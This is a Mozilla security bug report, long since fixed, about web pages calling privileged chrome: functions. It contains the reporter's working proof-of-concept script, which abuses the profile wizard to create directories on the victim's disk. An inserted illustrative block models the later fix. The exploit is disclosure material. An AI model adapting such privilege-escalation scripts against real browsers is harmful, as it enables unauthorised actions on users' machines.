Closed Bug 21923 Opened 25 years ago Closed 25 years ago

Executing functions in "chrome:" protocol - #2.

Categories

(Core :: Security, defect, P3)

x86
Windows 95
defect

Tracking

VERIFIED FIXED

People

(Reporter: joro, Assigned: norrisboyd)

Details

There is another chrome vulnerability, which allows executing JavaScript
functions in the "chrome:" protocol.
This is dangerous because such functions have many more privileges than
JavaScript functions loaded from a web page.
If one opens a "chrome:" URL in a window, he has access to all functions in the
window and the functions are executed by "windowname.functionname()" in the
"chrome:" protocol.
Some of the predefined functions in the Mozilla chrome may do dangerous things.

The code is:
----------------------------------------------------------------------
<SCRIPT>
b=window.open("","victim");
function g()
{
b.profile.createNewProfile("georgi","c:\\georgi\\");
alert("Profile created! You'd better close this window because directories are created");
}
setInterval("g()",4000);
</SCRIPT>

<A HREF="chrome://profile/content/createProfileWizard.xul"
TARGET="victim">Follow this link for demonstration</A>
----------------------------------------------------------------------
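As an added illustration (not Mozilla's code and not part of the report), a simplified model of the check the fix comment describes ("Added call to CheckLoadURI from TriggerLink"); the function names only mirror that comment, the privileged-scheme set and the http: origin are assumptions.

```javascript
// Simplified model of the policy the fix comment describes: before a link is
// followed, compare the privilege of the document owning the link with the
// privilege the target scheme would confer. Web content must never load a
// chrome: document into a window it holds a reference to, because every
// function that document defines becomes callable through that reference.

// Schemes whose documents run with chrome privilege (assumption of this model).
const PRIVILEGED_SCHEMES = new Set(["chrome:"]);

// Decide whether a document at sourceURI may load href (absolute or relative).
function checkLoadURI(sourceURI, href) {
  let source, target;
  try {
    source = new URL(sourceURI);
    target = new URL(href, sourceURI); // resolve relative hrefs first
  } catch {
    return { allowed: false, target: null, reason: "unparseable URI" };
  }
  if (!PRIVILEGED_SCHEMES.has(target.protocol)) {
    return { allowed: true, target: target.href, reason: "ordinary content" };
  }
  if (PRIVILEGED_SCHEMES.has(source.protocol)) {
    return { allowed: true, target: target.href, reason: "chrome loading chrome" };
  }
  return {
    allowed: false,
    target: target.href,
    reason: `${source.protocol} content may not load ${target.protocol} URIs`,
  };
}

// Following a link into a named window (the TARGET="victim" case): the window
// is navigated only when the check passes, so an opener holding a reference
// to it never finds a privileged document there.
function triggerLink(sourceURI, href, win) {
  const verdict = checkLoadURI(sourceURI, href);
  if (verdict.allowed) {
    win.location = verdict.target;
    win.privileged = PRIVILEGED_SCHEMES.has(new URL(verdict.target).protocol);
  }
  return verdict;
}

// Constructed walk-through of the report's scenario: an http: page (made-up
// origin) opens an empty named window and aims a chrome: link at it.
const victim = { location: "about:blank", privileged: false };
const fromWeb = triggerLink("http://attacker.example/demo.html",
  "chrome://profile/content/createProfileWizard.xul", victim);
console.log(fromWeb.allowed, victim.location); // false about:blank
```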
Status: NEW → ASSIGNED
Target Milestone: M13
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
Added call to CheckLoadURI from TriggerLink.
Verified fixed.
Status: RESOLVED → VERIFIED
Bulk moving all Browser Security bugs to new Security: General component. The previous Security component for Browser will be deleted.
Component: Security → Security: General